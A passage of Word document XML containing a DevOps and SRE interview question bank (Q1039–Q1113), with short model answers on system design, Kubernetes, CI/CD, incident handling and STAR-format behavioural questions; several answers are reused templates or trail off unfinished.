        <w:t>A: DR testing validates whether disaster recovery plans actually meet RTO and RPO. It should include failover drills, restore tests, dependency checks, runbook validation, and post-test improvements.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>DR Testing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Q1039. Explain scaling bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Scaling bottlenecks are limits that prevent a system from handling more load. Common bottlenecks include databases, locks, queues, network, CPU, memory, storage I/O, quotas, and external dependencies.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Scaling Bottlenecks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Q1040. What is traffic shaping?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Traffic shaping controls how traffic is routed, delayed, limited, or prioritized. It is used for canaries, migrations, rate limiting, load management, and protecting critical services.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Traffic Shaping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Q1041. Explain zero downtime deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Zero downtime deployment releases new versions without interrupting users. It uses readiness checks, rolling or blue-green deployment, backward-compatible changes, load balancing, and safe database migrations.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Zero Downtime Deployment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Q1042. Explain cloud-native patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud-native patterns include containers, service discovery, autoscaling, immutable infrastructure, externalized configuration, health checks, circuit breakers, retries, observability, and GitOps.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud-native Patterns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Q1043. What are common system design interview scenarios?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common system design scenarios include URL shorteners, ride sharing, chat, video streaming, payment systems, logging platforms, Kubernetes platforms, MLOps platforms, and global SaaS architectures.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Common System Design Interview Scenarios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Q1044. Design a global-scale Kubernetes platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A global-scale Kubernetes platform should use regional clusters, GitOps, standardized node pools, network policies, service mesh where useful, centralized observability, workload identity, admission policies, and progressive delivery. It also needs multi-region routing, disaster recovery, capacity planning, tenant isolation, cost governance, and platform self-service.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Global-scale Kubernetes Platform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Q1045. Design an enterprise MLOps platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An enterprise MLOps platform should provide data pipelines, feature stores, experiment tracking, model registry, training orchestration, model serving, monitoring, governance, and CI/CD. It should integrate with IAM, secrets, audit logs, Kubernetes or managed ML services, and automated retraining workflows.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Enterprise MLOps Platform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Q1046. Design a highly available SaaS application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A highly available SaaS application should use multi-zone deployment, load balancing, autoscaling, redundant databases, backups, health checks, observability, rate limiting, and tested failover. It should also include tenant isolation, secure IAM, zero-downtime deployments, and clear SLOs.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Highly Available Saas Application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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>SRE, Behavioural &amp; Scenario Questions (861–1000)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1047. Explain a major production outage you handled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention impact, detection signal, incident command, mitigation, rollback or failover, customer communication, RCA, and preventive actions.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Q1048. Describe a difficult Kubernetes incident.</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Q1049. Tell me about a failed deployment.</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Q1050. Explain how you reduced MTTR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain how better alerts, runbooks, dashboards, ownership, automation, and rollback reduced recovery time.</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Q1051. Describe a Sev-1 incident.</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Q1052. Explain your RCA process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Describe timeline reconstruction, contributing factors, customer impact, root cause, corrective actions, owners, and due dates.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Q1053. Describe a networking issue you solved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention DNS, routes, firewalls, security groups, load balancers, packet captures, latency, packet loss, and dependency checks.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Q1054. Explain a scaling problem you fixed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain the bottleneck, capacity signals, autoscaling limits, load testing, resource tuning, and how you verified improvement.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Q1055. Describe a cloud cost optimization initiative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention rightsizing, autoscaling, committed/spot capacity, storage lifecycle, idle cleanup, tagging, budgets, and FinOps ownership.</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cost visibility, rightsizing, autoscaling, waste removal, and protecting reliability while reducing spend.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Q1056. Explain a CI/CD pipeline failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Cover failed stage, logs, artifact/version checks, runner health, credentials, rollback, and how pipeline guardrails were improved.</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Q1057. Describe a Terraform state issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention state locking, drift, provider versions, plan review, remote state, imports, and safe recovery from partial applies.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Q1058. Explain a Kubernetes upgrade challenge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Include checks for events, pod status, logs, probes, resource pressure, networking, RBAC, node health, rollout history, and cluster-level metrics.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Q1059. Describe a security incident response.</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Q1060. Explain how you handled alert fatigue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain deduplication, severity tuning, ownership, SLO-based alerts, silences, runbooks, and removal of non-actionable alerts.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Q1061. Describe a high-pressure production issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For a high-pressure production issue,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Q1062. Explain a monitoring gap you identified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention missing signal, added metrics/logs/traces, dashboards, SLO alerts, runbooks, and validation during future incidents.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Q1063. Describe your on-call experience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss handoff, runbooks, dashboards, escalation paths, alert review, incident notes, and post-incident learning.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Q1064. Explain a rollback strategy you used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain rollback trigger, artifact versioning, database compatibility, traffic switch, validation, and communication.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Q1065. Describe a migration project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Cover discovery, dependency mapping, phased rollout, data sync, validation, rollback plan, and stakeholder communication.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Q1066. Explain a multi-cloud challenge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For a multi-cloud challenge,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Q1067. Describe a difficult stakeholder conversation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain alignment on impact, options, tradeoffs, risks, timelines, and transparent communication.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Q1068. Explain how you mentor juniors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention setting expectations, pairing, feedback, learning plan, measurable goals, and follow-up.</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Q1069. Describe a failed architecture decision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss requirements, constraints, tradeoffs, failure modes, scalability, security, and operability.</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Q1070. Explain a successful automation project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention toil removed, workflow automated, safeguards added, measurable time saved, and reliability improvement.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Q1071. Describe a GitOps implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Include Git as source of truth, PR review, Argo CD or Flux reconciliation, drift detection, secrets, policies, and rollback.</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Q1072. Explain your Kubernetes troubleshooting process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Include checks for events, pod status, logs, probes, resource pressure, networking, RBAC, node health, rollout history, and cluster-level metrics.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Q1073. Describe a DNS outage scenario.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention impact, detection signal, incident command, mitigation, rollback or failover, customer communication, RCA, and preventive actions.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Q1074. Explain pod crash debugging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention describe pod, logs, previous logs, events, probes, image pull, config, secrets, resource limits, and CrashLoopBackOff causes.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Q1075. Describe a memory leak investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss memory graphs, heap/profile analysis, container limits, OOM events, code path isolation, and remediation.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Q1076. Explain a CPU spike incident.</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Q1077. Describe node pressure handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss disk, memory, PID, and CPU pressure, evictions, taints, capacity, cleanup, and node autoscaling.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Q1078. Explain cluster autoscaler issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention pending pods, requests, quotas, node pool limits, taints/tolerations, zones, and cloud provider capacity.</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Q1079. Describe API latency troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Cover RED metrics, traces, dependency latency, database queries, saturation, p95/p99, caching, and load balancer behavior.</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Q1080. Explain a database bottleneck issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention slow queries, locks, indexes, connection pools, IOPS, replicas, caching, and scaling strategy.</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Q1081. Describe an observability improvement project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Cover scope, ownership, constraints, execution, risks, measurable outcome, and lessons learned.</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Q1082. Explain a service mesh issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss sidecar health, mTLS certificates, policies, retries, timeouts, traffic routing, and telemetry.</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Q1083. Describe a deployment rollback scenario.</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Q1084. Explain blue-green deployment implementation.</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Q1085. Describe canary deployment monitoring.</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Q1086. Explain infrastructure drift remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention drift detection, plan review, source-of-truth updates, reconciliation, and preventing manual changes.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Q1087. Describe an IaC governance project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss module standards, policy checks, approvals, state controls, tagging, and audit evidence.</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Q1088. Explain secret management implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention secret managers, rotation, least privilege, short-lived credentials, audit logs, and no secrets in Git or images.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Q1089. Describe cloud migration planning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Cover discovery, dependency mapping, phased rollout, data sync, validation, rollback plan, and stakeholder communication.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Q1090. Explain a compliance audit experience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention controls, evidence collection, audit logs, access reviews, encryption, vulnerability management, and remediation tracking.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Q1091. Describe Kubernetes RBAC troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Include checks for events, pod status, logs, probes, resource pressure, networking, RBAC, node health, rollout history, and cluster-level metrics.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Q1092. Explain image vulnerability remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention scanning, severity triage, fixed image rebuilds, dependency upgrades, exceptions, and deployment gates.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Q1093. Describe reducing deployment time.</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Q1094. Explain optimizing CI/CD pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Cover failed stage, logs, artifact/version checks, runner health, credentials, rollback, and how pipeline guardrails were improved.</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Q1095. Describe a failed release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For a failed release,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Q1096. Explain disaster recovery testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Cover RTO/RPO, backups, replication, failover runbooks, restore tests, and post-test improvements.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Q1097. Describe backup restoration testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention restore validation, encryption, retention, isolation, monitoring, and recovery-time measurement.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Q1098. Explain a load balancer issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss health checks, backend status, firewall rules, certificates, routing, logs, and traffic distribution.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Q1099. Describe SSL certificate outage handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention impact, detection signal, incident command, mitigation, rollback or failover, customer communication, RCA, and preventive actions.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Q1100. Explain how you secure Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Include checks for events, pod status, logs, probes, resource pressure, networking, RBAC, node health, rollout history, and cluster-level metrics.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Q1101. Describe a platform engineering initiative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For a platform engineering initiative,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Q1102. Explain how you define SLOs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain user journeys, SLIs, targets, windows, error budgets, alerting, and review cadence.</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Q1103. Describe error budget enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss burn rate, release decisions, reliability investment, stakeholder alignment, and policy enforcement.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Q1104. Explain reducing infrastructure costs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention rightsizing, autoscaling, committed/spot capacity, storage lifecycle, idle cleanup, tagging, budgets, and FinOps ownership.</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cost visibility, rightsizing, autoscaling, waste removal, and protecting reliability while reducing spend.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Q1105. Describe a monitoring dashboard you built.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention missing signal, added metrics/logs/traces, dashboards, SLO alerts, runbooks, and validation during future incidents.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Q1106. Explain a production debugging strategy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain hypothesis-driven investigation using metrics, logs, traces, recent changes, dependencies, and safe mitigations.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Q1107. Describe improving deployment reliability.</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Q1108. Explain handling conflicting priorities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain impact-based prioritization, risk, deadlines, stakeholder alignment, and explicit tradeoffs.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Q1109. Describe a difficult team conflict.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For a difficult team conflict,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Q1110. Explain how you handle criticism.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention listening, clarifying, separating intent from impact, acting on useful feedback, and following up.</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Q1111. Describe a project you owned end-to-end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Cover scope, ownership, constraints, execution, risks, measurable outcome, and lessons learned.</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Q1112. Explain a leadership experience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention aligning people, making decisions under uncertainty, communicating clearly, and improving team outcomes.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Q1113. Describe your communication style.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
